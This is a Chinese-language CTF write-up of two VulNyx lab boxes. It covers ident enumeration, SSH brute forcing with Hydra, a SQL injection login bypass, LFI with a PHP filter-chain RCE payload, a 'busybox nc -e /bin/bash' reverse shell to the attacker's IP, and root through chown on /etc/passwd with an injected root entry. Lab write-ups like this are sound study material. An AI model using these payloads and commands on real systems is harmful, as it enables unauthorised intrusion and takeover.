VulNyx
Lower4
信息搜集
这个VulNyx的靶机比较友好,他自己出厂就是桥接模式并且会把ip地址告诉你,把kali改成桥接就可以了,靶机的ip地址为192.168.1.103,扫描一下端口
┌──(root㉿kali-plus)-[~]
└─# nmap -p- 192.168.1.103
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-16 00:27 CST
Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping Scan
ARP Ping Scan Timing: About 100.00% done; ETC: 00:27 (0:00:00 remaining)
Stats: 0:00:00 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 5.98% done; ETC: 00:27 (0:00:00 remaining)
Stats: 0:00:00 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 6.44% done; ETC: 00:27 (0:00:00 remaining)
Stats: 0:00:00 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 7.20% done; ETC: 00:27 (0:00:00 remaining)
Stats: 0:00:00 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 7.74% done; ETC: 00:27 (0:00:00 remaining)
Nmap scan report for bogon (192.168.1.103)
Host is up (0.00082s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
113/tcp open ident
MAC Address: 00:0C:29:46:81:C7 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 6.16 seconds
开放了22,80和113,先看一眼80端口,就一个apache服务,扫描一下目录,啥也没扫出来,还是得看113这个端口,一开始并不知道这个ident这个服务,还是开启了懦夫模式去看了一下wp,并在https://book.hacktricks.wiki/zh/network-services-pentesting/113-pentesting-ident.html这个网站看到了关于这个ident协议的一些知识
Ident协议用于通过互联网将TCP连接与特定用户关联。最初设计用于帮助网络管理和安全,它通过允许服务器在113端口查询客户端以请求有关特定TCP连接用户的信息来操作。
然而,由于现代隐私问题和潜在的滥用,其使用已减少,因为它可能无意中向未经授权的方泄露用户信息。建议采取增强的安全措施,例如加密连接和严格的访问控制,以减轻这些风险。
默认端口: 113
PORT STATE SERVICE
113/tcp open ident
有一个知识点就是使用nmap时加上-sC参数就能看到每个端口的用户
113端口渗透 user flag
┌──(root㉿kali-plus)-[~]
└─# nmap -sC 192.168.1.103
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-16 01:23 CST
Nmap scan report for bogon (192.168.1.103)
Host is up (0.00017s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
|_auth-owners: root
| ssh-hostkey:
| 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_ 256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp open http
|_http-title: Apache2 Debian Default Page: It works
113/tcp open ident
|_auth-owners: lucifer
MAC Address: 00:0C:29:46:81:C7 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.76 seconds
这里也是得到了113端口的用户时lucifer,这个网站上也提到了一个工具是
ident-user-enumhttps://github.com/pentestmonkey/ident-user-enum 这个工具使用起来也很简单,使用命令ident-user-enum
┌──(root㉿kali-plus)-[~/ident-user-enum-master]
└─# ident-user-enum 192.168.1.103 113
ident-user-enum v1.0 ( http://pentestmonkey.net/tools/ident-user-enum )
192.168.1.103:113 lucifer
知道用户名,就该去爆破了,因为80端口啥也没有,剩下22端口就是去ssh连接,使用九头蛇爆破ssh密码
┌──(root㉿kali-plus)-[~]
└─# hydra -l lucifer -P 1000.txt -t 10 ssh://192.168.1.103
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-16 01:51:07
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 10 tasks per 1 server, overall 10 tasks, 1425 login tries (l:1/p:1425), ~143 tries per task
[DATA] attacking ssh://192.168.1.103:22/
[22][ssh] host: 192.168.1.103 login: lucifer password: 789456123
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-03-16 01:51:17
事实证明,找到一个符合题设的字典也很重要,接下来就是ssh连接了,连接上去之后就是一个user.txt
lucifer@lower4:~$ cat user.txt
8e99e9f5a7d2d7a067314e34d9fd957f
接下来就是提权,首先sudo -l看看可以以root权限执行什么
提权 root flag
lucifer@lower4:~$ sudo -l
Matching Defaults entries for lucifer on lower4:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User lucifer may run the following commands on lower4:
(root) NOPASSWD: /usr/bin/multitail
这个工具没法直接提权,但是可以看一下手册,发现使用工具并输入a 之后可以打开一个命令行窗口,尝试反弹shell
┌──(root㉿kali-plus)-[/usr/share/wordlists]
└─# nc -lvvp 4444
Listening on 0.0.0.0 4444
id
Connection received on bogon 58762
uid=0(root) gid=0(root) grupos=0(root)
ls
user.txt
ls /
bin
boot
dev
etc
home
initrd.img
initrd.img.old
lib
lib32
lib64
libx32
lost+found
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old
cd root
ls
user.txt
pwd
/home/lucifer
cd /root
ls
root.txt
cat root.txt
c07db370f9e16dcde97d554b38c9c08e
Loweb
信息搜集
ip地址为192.168.1.103,对端口信息进行搜集
┌──(root㉿kali-plus)-[~]
└─# nmap -sC 192.168.1.103 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-17 23:26 CST
Nmap scan report for bogon (192.168.1.103)
Host is up (0.00069s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
| ssh-hostkey:
| 256 65:bb:ae:ef:71:d4:b5:c5:8f:e7:ee:dc:0b:27:46:c2 (ECDSA)
|_ 256 ea:c8:da:c8:92:71:d8:8e:08:47:c0:66:e0:57:46:49 (ED25519)
80/tcp open http
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 00:0C:29:B9:80:D2 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 6.39 seconds
发现80和22端口是开放的,看一下80端口是什么情况,是一个apache服务,其他啥也没有,扫一下目录
┌──(root㉿kali-plus)-[~]
└─# dirsearch -u http://192.168.1.103/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/reports/http_192.168.1.103/__25-03-17_23-28-51.txt
Target: http://192.168.1.103/
[23:28:51] Starting:
[23:28:53] 403 - 278B - /.ht_wsr.txt
[23:28:53] 403 - 278B - /.htaccess.bak1
[23:28:53] 403 - 278B - /.htaccess.sample
[23:28:53] 403 - 278B - /.htaccess.orig
[23:28:53] 403 - 278B - /.htaccess.save
[23:28:53] 403 - 278B - /.htaccess_extra
[23:28:53] 403 - 278B - /.htaccess_sc
[23:28:53] 403 - 278B - /.htaccessOLD
[23:28:53] 403 - 278B - /.htaccessOLD2
[23:28:53] 403 - 278B - /.htaccess_orig
[23:28:53] 403 - 278B - /.htm
[23:28:53] 403 - 278B - /.html
[23:28:53] 403 - 278B - /.htaccessBAK
[23:28:53] 403 - 278B - /.htpasswd_test
[23:28:53] 403 - 278B - /.htpasswds
[23:28:53] 403 - 278B - /.httr-oauth
[23:28:54] 403 - 278B - /.php
[23:29:13] 301 - 316B - /library -> http://192.168.1.103/library/
[23:29:21] 403 - 278B - /server-status/
[23:29:21] 403 - 278B - /server-status
Task Completed
发现有一个/library目录访问,没有什么有价值的信息,把/library加上再扫描试试
┌──(root㉿kali-plus)-[~]
└─# dirsearch -u http://192.168.1.103/library
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/reports/http_192.168.1.103/_library_25-03-17_23-32-17.txt
Target: http://192.168.1.103/
[23:32:18] Starting: library/
[23:32:19] 403 - 278B - /library/.ht_wsr.txt
[23:32:19] 403 - 278B - /library/.htaccess.bak1
[23:32:19] 403 - 278B - /library/.htaccess.sample
[23:32:19] 403 - 278B - /library/.htaccess.save
[23:32:19] 403 - 278B - /library/.htaccess.orig
[23:32:19] 403 - 278B - /library/.htaccess_extra
[23:32:19] 403 - 278B - /library/.htaccess_orig
[23:32:19] 403 - 278B - /library/.htaccess_sc
[23:32:19] 403 - 278B - /library/.htaccessOLD
[23:32:19] 403 - 278B - /library/.htaccessBAK
[23:32:19] 403 - 278B - /library/.htaccessOLD2
[23:32:19] 403 - 278B - /library/.htm
[23:32:19] 403 - 278B - /library/.html
[23:32:19] 403 - 278B - /library/.htpasswd_test
[23:32:19] 403 - 278B - /library/.htpasswds
[23:32:19] 403 - 278B - /library/.httr-oauth
[23:32:20] 403 - 278B - /library/.php
[23:32:23] 301 - 322B - /library/admin -> http://192.168.1.103/library/admin/
[23:32:24] 302 - 0B - /library/admin/ -> /library/login/index.php
[23:32:24] 302 - 0B - /library/admin/index.php -> /library/login/index.php
[23:32:39] 301 - 322B - /library/login -> http://192.168.1.103/library/login/
[23:32:39] 200 - 793B - /library/login/
Task Completed
发现有个登录页面,但是没测出来弱密码,猜测是sql注入,把登录数据包打包成txt让sqlmap跑一下
sqlmap -l Loweb.txt --batch,发现有停顿,说明有sql注入,就是在登录那里,测试账号为admin1' or 1=1 -- -密码随便输入一个就进去了,又测试了一遍admin/admin1' or 1=1 -- -也能进去,进去之后看到另一个用户名 r3dh4ck,还有好多熟人,但是这些熟人好像没什么用,然后就是看能不能用sqlmap去跑出密码来
sqlmap -l Loweb.txt --batch -dbs
sqlmap -l Loweb.txt --batch -D library -tables
sqlmap -l Loweb.txt --batch -D library -T user -columns
sqlmap -l Loweb.txt --batch -D library -T use -C password -dump
$2y$10$AkhF2T9slTqNPbwh6eRbVeLr5XW8ZqWvJ/zFapZ7Y8ZK0G70Hxo3W
vi Loweb-tmp
john Loweb-tmp --wordlist=/usr/share/wordlists/rockyou.txt
发现注出来的密码解不出来,只能另寻出路了,在翻看页面源码时,发现index.php?lang=en.php试试能不能任意文件读取,发现../../../../../../../etc/passwd可以读取用户信息
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
sshd:x:101:65534::/run/sshd:/usr/sbin/nologin
r3dh4ck:x:1000:1000::/home/r3dh4ck:/bin/bash
mysql:x:102:110:MySQL Server,,,:/nonexistent:/bin/false
尝试把源代码读出来?lang=php://filter/read=convert.base64-encode/resource=index.php
<?php
session_start();
if(!isset($_SESSION['username'])){
header('Location: /library/login/index.php');
exit;
}
?>
<!DOCTYPE html>
<html lang="en" >
<head>
<meta charset="UTF-8">
<title>Admin Panel</title>
<link rel='stylesheet' href='//code.ionicframework.com/ionicons/2.0.1/css/ionicons.min.css'><link rel="stylesheet" href="./style.php">
</head>
<body>
<!-- partial:index.partial.html -->
<div class="container">
<div class="drawer">
<a class="navicon" href="#"><i class="icon ion-navicon"></i></a>
<div class="menu">
<a data-menu="dashboard" href="#" class="active"><i class="icon ion-home"></i></a>
<a data-menu="users" href="#"><i class="icon ion-person-stalker"></i></a>
<a data-dialog="logout" href="#"><i class="icon ion-log-out"></i></a>
<a data-menu="download" href="#"><i class="icon ion-code-download"></i></a>
<a data-menu="about" href="#"><i class="icon ion-information-circled"></i></a>
</div>
<span class="credits">VulNyx - Jackie0x17</span>
</div>
<div class="content">
<div class="page active" data-page="dashboard">
<div class="header">
<div class="title">
<h2>Dashboard</h2>
</div>
</div>
<div class="grid">
<div class="card">
<div class="head">
<span class="icon">
<i class="icon ion-pound"></i>
</span>
<span class="stat">
Server Status
</span>
<div class="status">
</div>
</div>
<div class="body">
<h2>Server is currently $_status</h2>
<p>
The server is running normally and no issues have recently been detected. If you notice an outage, please report it to the administrator.
</p>
</div>
<div class="footer">
<div class="user">
<div class="user-icon">
</div>
<span class="username">
admin
</span>
</div>
</div>
</div>
<div class="card">
<div class="head">
<span class="icon">
<i class="icon ion-code-working"></i>
</span>
<span class="stat">
VulNyx Status
</span>
<div class="status">
</div>
</div>
<div class="body">
<h2>Cheat is currently $_status</h2>
<p>
The server is running normally and no issues have recently been detected. If you notice an outage, please report it to the administrator.
</p>
</div>
<div class="footer">
<div class="user">
<div class="user-icon">
</div>
<span class="username">
r3dh4ck
</span>
</div>
</div>
</div>
<div class="card-verticle">
<div class="card-small">
<span class="title">
Active Users
</span>
<h2 class="text">12</h2>
<div class="graph">
<div class="bar" data-day="sunday">
<div class="bar-content"></div>
</div>
<div class="bar" data-day="monday">
<div class="bar-content"></div>
</div>
<div class="bar" data-day="tuesday">
<div class="bar-content"></div>
</div>
<div class="bar" data-day="wednesday">
<div class="bar-content"></div>
</div>
<div class="bar" data-day="thursday">
<div class="bar-content"></div>
</div>
<div class="bar" data-day="friday">
<div class="bar-content"></div>
</div>
<div class="bar" data-day="saturday">
<div class="bar-content"></div>
</div>
</div>
</div>
<div class="card-small">
<span class="title">
Overview
</span>
</div>
</div>
</div>
<div class="stats">
</div>
</div>
<div class="page noflex" data-page="users">
<div class="header">
<div class="title">
<h2>Users</h2>
</div>
</div>
<div class="grid">
<div class="user-edit">
<div class="header">
<span class="icon">
<i class="icon ion-person"></i>
</span>
<span class="user-edit-name">$_USERNAME</span>
<a href="#" class="close"><i class="icon ion-close-round"></i></a>
</div>
</div>
<div class="users-table">
<div class="users-item header">
<div class="table-item noflex">
ID
</div>
<div class="table-item">
Email Address
</div>
<div class="table-item">
Username
</div>
<div class="table-item">
Nickname
</div>
<div class="table-item">
Active
</div>
<div class="table-item">
Premium
</div>
</div>
</div>
</div>
</div>
<div class="page noflex" data-page="download">
<div class="header">
<div class="title">
<h2>Download</h2>
</div>
</div>
<div class="grid">
<div class="card wide">
<div class="head">
<span class="icon">
<i class="icon ion-code-working"></i>
</span>
<span class="stat">
Cheat Client
</span>
<div class="status">
</div>
</div>
<div class="body">
<h2>Latest Version: v$_VERSION</h2>
<p>
changelog here
</p>
</div>
<div class="footer">
<div class="user">
<div class="user-icon">
</div>
<span class="username">
Administrator
</span>
</div>
<a class="download" href="#">Download <i class="icon ion-archive"></i></a>
</div>
</div>
</div>
</div>
<div class="page noflex" data-page="about">
<div class="header">
<div class="title">
<h2>About</h2>
</div>
</div>
<div class="info-container">
<div class="info">
<a href="http://uplusion23.net/" target="_blank">Developer</a>
<span>uplusion23</span>
</div>
<div class="info">
<a href="#" target="_blank">Dashboard Version</a>
<span>1.0.0</span>
</div>
<div class="info">
<a href="#" target="language">Language</a>
<span>
<a href="index.php?lang=es.php">es</a>
<a href="index.php?lang=en.php">en</a>
</span>
</div>
</div>
</div>
</div>
<div class="sidebar">
</div>
 <div class="dialog">
<div class="dialog-block">
<h2>Are you sure you want to logout?</h2>
<div class="controls">
<a href="../login/index.php" class="button">Logout</a>
<a data-dialog-action="cancel" href="#" class="button">Cancel</a>
</div>
</div>
</div>
</div>
<!-- partial -->
<script src='https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js'></script><script src="./script.php"></script>
</body>
</html>
<?php
$lang = isset($_GET['lang']) ? $_GET['lang'] : '';
include($lang)
?>
最后面就是一个木马,用php那个工具生成payload
┌──(root㉿kali-plus)-[/home/test/Desktop/php_filter_chain_generator]
└─# python3 php_filter_chain_generator.py --chain "<?php system(\$_GET['a']);?>"
[+] The following gadget chain will generate the following code : <?php system($_GET['a']);?> (base64 value: PD9waHAgc3lzdGVtKCRfR0VUWydhJ10pOz8+)
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM891.CSUNICODE|convert.iconv.ISO8859-14.ISO6937|convert.iconv.BIG-FIVE.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UNICODE|convert.iconv.ISIRI3342.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.864.UTF32|convert.iconv.IBM912.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.ISO6937.8859_4|convert.iconv.IBM868.UTF-16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp
紧接着在后面加上&a=busybox nc 192.168.1.104 4444 -e /bin/bash第一次直接使用nc没弹成功,后面改为busybox了,拿到shell之后使用命令生成交互式shell,但是我不知道为什么我没有成功,不管了没有也一样用,我以为到这里就能拿到user.txt了,但是权限不够,我们拿到的shell目录是在网站那个目录下,权限不够,还得切换用户,这里找了半天发现,在opt目录有一个monitor.sh的文件
user flag
#!/bin/bash
LOGDIR="/var/log/monitor"
LOGFILE="$LOGDIR/system_monitor_$(date +%Y%m%d%H%M%S).log"
mkdir -p $LOGDIR
echo "=== Monitoring started: $(date) ===" >> $LOGFILE
echo ">> Open ports and associated processes:" >> $LOGFILE
ss -tulpn | grep LISTEN >> $LOGFILE 2>/dev/null
echo -e "\n>> Currently connected users:" >> $LOGFILE
who >> $LOGFILE
echo -e "\n>> System information:" >> $LOGFILE
echo "Hostname: $(hostname)" >> $LOGFILE
echo "Kernel version: $(uname -r)" >> $LOGFILE
echo "Uptime: $(uptime -p)" >> $LOGFILE
echo -e "\n>> Generating simulated credentials for audit:" >> $LOGFILE
SECRET_USER="r3dh4ck"
SECRET_PASS="contraseñaconÑjeje" # Change this password for the future
echo "User: SECRET_USER" >> $LOGFILE
echo "Password: SECRET_PASS" >> $LOGFILE
echo -e "\n>> Possible suspicious processes running:" >> $LOGFILE
ps aux | grep -i 'nc\|netcat\|ncat\|bash\|sh' | grep -v grep >> $LOGFILE
echo -e "\n=== Monitoring finished: $(date) ===" >> $LOGFILE
得到密码为contraseñaconÑjeje
su - r3dh4ck
contraseñaconÑjeje
id
uid=1000(r3dh4ck) gid=1000(r3dh4ck) groups=1000(r3dh4ck)
这里虽然成功切换用户了,但是发现user.txt没有权限呢,直接修改所属组
sudo /usr/bin/chown r3dh4ck:r3dh4ck user.txt
然后就拿到user flag了
ed568ec0cd3aef96d4c17a7f02a8391e
提权-root flag
chown命令的解释和用法:https://www.runoob.com/linux/linux-comm-chown.html
chown <用户名> <文件> 例如:chown root /root/root.txt
sudo /usr/bin/chown r3dh4ck /etc/passwd
sed -i '1i root:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash' /etc/passwd
root@loweb:~# cat r00t.txt
f6a0195e175989b2f9dd92fe4e35d6e4
浙公网安备 33010602011771号